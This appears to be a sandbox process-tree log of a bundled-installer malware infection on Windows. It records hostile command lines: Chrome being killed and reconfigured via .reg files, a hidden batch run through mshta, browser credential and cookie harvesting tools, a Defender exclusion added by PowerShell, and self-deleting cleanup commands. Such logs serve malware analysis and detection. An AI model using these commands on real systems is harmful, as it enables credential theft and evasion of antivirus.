C:\Users\Admin\AppData\Local\Temp\is-MDGBD.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-MDGBD.tmp\Setup.tmp" /SL5="$20574,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-JP5V6.tmp\Setup.exe" /Verysilent13⤵PID:4168
-
C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\ProPlugin.exe" /Verysilent14⤵PID:6020
-
C:\Users\Admin\AppData\Local\Temp\is-AI047.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-AI047.tmp\ProPlugin.tmp" /SL5="$204FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\ProPlugin.exe" /Verysilent15⤵PID:6980
-
C:\Users\Admin\AppData\Local\Temp\is-3I6IM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3I6IM.tmp\Setup.exe"16⤵PID:6372
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"17⤵PID:3948
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe18⤵
- Kills process with taskkill
PID:6484
-
-
C:\Windows\regedit.exeregedit /s chrome.reg18⤵
- Runs .reg file with regedit
PID:3296
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat18⤵PID:4700
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)19⤵PID:7428
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\chrome64.bat" h"20⤵PID:7520
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"21⤵PID:7884
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xdc,0xe0,0xe4,0xb8,0xe8,0x7ff8dae16e00,0x7ff8dae16e10,0x7ff8dae16e2022⤵PID:7900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1636 /prefetch:822⤵PID:6676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1588 /prefetch:222⤵PID:7152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2680 /prefetch:122⤵PID:7340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2664 /prefetch:122⤵PID:6180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:122⤵PID:2568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:122⤵PID:4844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:122⤵PID:904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:122⤵PID:1172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4276 /prefetch:822⤵PID:7352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4432 /prefetch:822⤵PID:7236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4616 /prefetch:822⤵PID:2032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4576 /prefetch:822⤵PID:7684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 /prefetch:822⤵PID:7736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4392 /prefetch:822⤵PID:7352
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings22⤵PID:6604
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6a5737740,0x7ff6a5737750,0x7ff6a573776023⤵PID:5372
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4356 /prefetch:822⤵PID:5968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4860 /prefetch:822⤵PID:2560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4692 /prefetch:822⤵PID:6252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3188 /prefetch:822⤵PID:7668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3608 /prefetch:822⤵PID:7472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3504 /prefetch:822⤵PID:7188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4556 /prefetch:822⤵PID:3580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5668 /prefetch:822⤵PID:1064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3496 /prefetch:822⤵PID:3928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3396 /prefetch:822⤵PID:204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3676 /prefetch:822⤵PID:2604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3572 /prefetch:822⤵PID:7532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5580 /prefetch:822⤵PID:3060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=784 /prefetch:822⤵PID:6732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=956 /prefetch:822⤵PID:4812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4020 /prefetch:822⤵PID:2752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:822⤵PID:6296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4728 /prefetch:822⤵PID:7740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4156 /prefetch:822⤵PID:7912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5584 /prefetch:822⤵PID:7724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4440 /prefetch:822⤵PID:5108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1440 /prefetch:822⤵PID:1392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1016 /prefetch:122⤵PID:7156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3312 /prefetch:822⤵PID:7668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3532 /prefetch:822⤵PID:5108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5616 /prefetch:822⤵PID:8220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3428 /prefetch:822⤵PID:8328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=844 /prefetch:822⤵PID:8468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4020 /prefetch:822⤵PID:8568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5580 /prefetch:822⤵PID:8736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4600 /prefetch:822⤵PID:8908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2356 /prefetch:122⤵PID:9032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3916 /prefetch:822⤵PID:9060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5512 /prefetch:822⤵PID:9200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5040 /prefetch:822⤵PID:8264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,3560184215687742041,18134355237642598439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4784 /prefetch:822⤵PID:8324
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg18⤵
- Runs .reg file with regedit
PID:7600
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b firefox18⤵PID:556
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b chrome18⤵PID:6828
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b edge18⤵PID:8012
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\PictureLAb.exe" /Verysilent14⤵PID:2840
-
C:\Users\Admin\AppData\Local\Temp\is-PTDL0.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-PTDL0.tmp\PictureLAb.tmp" /SL5="$304FC,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\PictureLAb.exe" /Verysilent15⤵PID:4500
-
C:\Users\Admin\AppData\Local\Temp\is-022MK.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-022MK.tmp\Setup.exe" /VERYSILENT16⤵PID:3624
-
C:\Users\Admin\AppData\Local\Temp\is-MLVCQ.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-MLVCQ.tmp\Setup.tmp" /SL5="$6057C,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-022MK.tmp\Setup.exe" /VERYSILENT17⤵PID:4824
-
C:\Users\Admin\AppData\Local\Temp\is-PB4DJ.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-PB4DJ.tmp\kkkk.exe" /S /UID=lab21418⤵PID:7236
-
C:\Program Files\Google\OYCDWENCLX\prolab.exe"C:\Program Files\Google\OYCDWENCLX\prolab.exe" /VERYSILENT19⤵PID:7620
-
C:\Users\Admin\AppData\Local\Temp\is-I9LSS.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-I9LSS.tmp\prolab.tmp" /SL5="$30512,575243,216576,C:\Program Files\Google\OYCDWENCLX\prolab.exe" /VERYSILENT20⤵PID:7660
-
-
-
C:\Users\Admin\AppData\Local\Temp\71-0e39a-bda-f7a9e-3e10b1b441b93\Jeshucynuhy.exe"C:\Users\Admin\AppData\Local\Temp\71-0e39a-bda-f7a9e-3e10b1b441b93\Jeshucynuhy.exe"19⤵PID:7632
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4cx4dh1c.vua\GcleanerWW.exe /mixone & exit20⤵PID:7000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kito5gxt.3im\privacytools5.exe & exit20⤵PID:7708
-
C:\Users\Admin\AppData\Local\Temp\kito5gxt.3im\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\kito5gxt.3im\privacytools5.exe21⤵PID:4328
-
C:\Users\Admin\AppData\Local\Temp\kito5gxt.3im\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\kito5gxt.3im\privacytools5.exe22⤵PID:7772
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xtzfasht.0py\setup.exe /8-2222 & exit20⤵PID:5728
-
C:\Users\Admin\AppData\Local\Temp\xtzfasht.0py\setup.exeC:\Users\Admin\AppData\Local\Temp\xtzfasht.0py\setup.exe /8-222221⤵PID:556
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Young-Sound"22⤵PID:228
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\51wrr40v.odb\MultitimerFour.exe & exit20⤵PID:7444
-
C:\Users\Admin\AppData\Local\Temp\51wrr40v.odb\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\51wrr40v.odb\MultitimerFour.exe21⤵PID:1064
-
C:\Users\Admin\AppData\Local\Temp\0VGEKNUEFV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0VGEKNUEFV\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10422⤵PID:564
-
C:\Users\Admin\AppData\Local\Temp\0VGEKNUEFV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0VGEKNUEFV\multitimer.exe" 1 3.1615015136.60432ce02ea19 10423⤵PID:5156
-
C:\Users\Admin\AppData\Local\Temp\0VGEKNUEFV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0VGEKNUEFV\multitimer.exe" 2 3.1615015136.60432ce02ea1924⤵PID:4076
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\Delta.exe" /Verysilent14⤵PID:7756
-
C:\Users\Admin\AppData\Local\Temp\is-9B4QV.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-9B4QV.tmp\Delta.tmp" /SL5="$503E6,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\Delta.exe" /Verysilent15⤵PID:7784
-
C:\Users\Admin\AppData\Local\Temp\is-3QIPP.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3QIPP.tmp\Setup.exe" /VERYSILENT16⤵PID:6172
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-3QIPP.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit17⤵PID:3608
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f18⤵
- Kills process with taskkill
PID:4744
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\zznote.exe" /Verysilent14⤵PID:2588
-
C:\Users\Admin\AppData\Local\Temp\is-4BQJA.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-4BQJA.tmp\zznote.tmp" /SL5="$304A4,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\zznote.exe" /Verysilent15⤵PID:2836
-
C:\Users\Admin\AppData\Local\Temp\is-DLFE4.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-DLFE4.tmp\jg4_4jaa.exe" /silent16⤵PID:7776
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\hjjgaa.exe" /Verysilent14⤵PID:552
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt15⤵PID:3236
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt15⤵PID:2968
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\re4u2taf1wk\vict.exe"C:\Users\Admin\AppData\Local\Temp\re4u2taf1wk\vict.exe" /VERYSILENT /id=53510⤵PID:6016
-
C:\Users\Admin\AppData\Local\Temp\is-3K6R4.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-3K6R4.tmp\vict.tmp" /SL5="$103F2,870426,780800,C:\Users\Admin\AppData\Local\Temp\re4u2taf1wk\vict.exe" /VERYSILENT /id=53511⤵PID:3400
-
C:\Users\Admin\AppData\Local\Temp\is-E3NIM.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-E3NIM.tmp\wimapi.exe" 53512⤵PID:6424
-
C:\Users\Admin\AppData\Local\Temp\yY5Xt8diG.exe"C:\Users\Admin\AppData\Local\Temp\yY5Xt8diG.exe"13⤵PID:6216
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im yY5Xt8diG.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\yY5Xt8diG.exe" & del C:\ProgramData\*.dll & exit14⤵PID:5464
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im yY5Xt8diG.exe /f15⤵
- Kills process with taskkill
PID:7040
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 615⤵
- Delays execution with timeout.exe
PID:6564
-
-
-
-
